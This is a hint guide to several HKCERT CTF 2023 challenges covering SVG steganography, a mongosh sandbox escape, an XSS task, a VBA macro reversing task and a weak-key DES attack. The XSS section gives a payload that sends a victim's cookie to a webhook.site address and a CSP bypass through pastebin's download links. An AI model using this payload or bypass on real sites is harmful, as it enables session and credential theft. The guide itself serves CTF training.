# HKCERT CTF 2023: Guide to handwavy challenges (II) [TOC] ## ST碼 (I) / ST Code (I) (Misc) * Browse `/flag1` will result in a QR Code,but it looks uneven * If you read the source code of the server carefully, you should know that it is a scalable vector graphic (SVG) * View the source code of the image, you can find that there are some `rx="0"` and `rx="1"`, which are suspicious * So this is the reason why the image looks uneven * Record these numbers from the top to the bottom, you should get `01101000 01101011 ...` * Can you guess what is the encoding scheme? __________ * Using this encoding scheme to decode,you should get `hkcert23{...` * Looks like this is the flag! <p style="transform: rotate(-180deg);">Answer:Binary ASCII Code</p> ## 獄門疆 / MongoJail (Pwn) ### Partial Spoiler * This challenge seems to be unrelated to "Goku Mon Kyo" * But it is related to MongoDB Shell (mongosh) * mongosh is a specialized node.js "Read–eval–print" loop (REPL) environment * You can enter any Javascript code in a restricted mongosh * All built-in variables and functions, and `require`,`module`,`globalThis` are also ~~sealed~~ became undefined * What else can we do? Let's have a look on the [Reference](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference) * Built-in objects are all ~~sealed~~ became undefined * Expressions & operators can still be used... At least you can do addition * ||Spoiler: Which method can be used to open the other side of the seal?|| ## 又有寶貝 XSS / Baby XSS again (Web) * First, you should have some understanding about XSS challenges in CTF * If you have no idea, maybe check out the description from [Infant XSS](https://github.com/blackb6a/hkcert-ctf-2021-challenges/tree/master/T1-infantxss) from HKCERT CTF 2021... * Basically you need to find an XSS vulnerability and send the webpage with the payload to the bot to perform sensitive actions or capture sensitive information, such as Cookie * For this challenge, the description has already told you that you can inject script using the `src` query string parameter, because of the following: ``` out += """<script src="%s"></script>""" % request.args.get("src", "http://example.com/") ``` * But there is Content Security Policy that restricts the source of the script to be from the domain `https://hcaptcha.com`,`https://*.hcaptcha.com` or `https://pastebin.com`: ``` <meta http-equiv="Content-Security-Policy" content="script-src https://hcaptcha.com https://*.hcaptcha.com https://pastebin.com"> ``` * I don't think you want to craft your gadget in hcaptcha.com, so let's go for the pastebin * First, craft a script that could redirect the victim to your webhook that captures sensitive information (The flag is in Cookie for this challenge), and post it on pastebin * For example, `location='https://webhook.site/your_webhook_site_id/?cookie='+document.cookie` * Then you should see your paste like this: https://pastebin.com/KvbMXuyv * To keep only the script code, you may use the "raw" function: https://pastebin.com/raw/KvbMXuyv * But when you tried to include the script, it doesn't work! * http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/raw/KvbMXuyv * Why? Because modern browser also checks the `Content-Type` header of the embedded file * The content type of file managed to be `text/plain` in this case, which will not be executed as javascript * How about the other way? Instead of "raw", we may also try "download": https://pastebin.com/dl/KvbMXuyv * This time it works, the page indeed redirects: http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/KvbMXuyv * Then you can send this link to the bot (and fill in the annoying CAPTCHA) and get the flag ## 轉蛋模擬器 / Gacha Simulator (Reverse) ### Partial Guide This challenge is best viewed with .NET Framework This is a pptm file, which is Macro Enabled. Make sure you check out the VBA code under the Developer tab. https://support.microsoft.com/en-au/office/show-the-developer-tab-e1192344-5e56-4d45-931b-e5fd9bea2d45 Can't see source code? Try this https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project Then there are many ways to solve, like changing the probability, rearrange the encrypted data, decrypt the encrypted data directly, etc. Good luck! ## 下手ですね / BADES (Crypto) ### Challenge Description In this challenge, we are given an slightly modified [Data Encryption Standard](https://en.wikipedia.org/wiki/Data_Encryption_Standard) (denoted by DES'). Additionally, we are given the two oracles: 1. `encrypt_flag` encrypts the flag using DES'-CBC. 2. `encrypt` encrypts an arbitrary message using DES'-CBC. The goal is to retrieve the flag using the above oracle calls. ### Partial Guide With `__left_rotations` being changed, _all_ keys became weak keys. If we are using [electronic codebook (ECB)](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)) mode of operation, $\text{Encrypt}(\text{Encrypt}(m)) = m$, or intuitively, encrypting the same message twice would result in getting the message. <p style="text-align: center;"><img src="https://hackmd.io/_uploads/HJDX812mp.png" style="width: 350px;"><br /><em>Figure 1.</em></p> However, in this case, we are using the CBC mode. This is how the a message is encrypted when we use `encrypt_flag` (or `encrypt`). At the very beginning, the message is padded to a size of multiple of 8. After that, it is chopped into blocks of 8 bytes: <p style="text-align: center;"><img src="https://hackmd.io/_uploads/ryrKjy2mT.png" style="width: 600px;"><br /><em>Figure 2.</em></p> It is then encrypted to the ciphertext $c_0 \| c_1 \| c_2 \| ...$ which is given to us. How can we make use of the "encrypting the ciphertext actually decrypts it" behaviour to recover $m_1, m_2, ...$? Let's show how we retrieve $m_1$ by encrypting $c_0 \oplus c_1$: <p style="text-align: center;"><img src="https://hackmd.io/_uploads/S1jaXx37a.png" style="width: 350px;"><br /><em>Figure 3.</em></p> Since $c_0 \oplus (c_0 \oplus c_1) = c_1$, the content we are passing to the encrypt function being $c_1$. In Figure 2, we know $\text{Encrypt}(c_1) = c_0 \oplus m_1$. Now we can recover $m_1$ by computing $c_0 \oplus (c_0 \oplus m_1)$. Now decrypt the remaining blocks!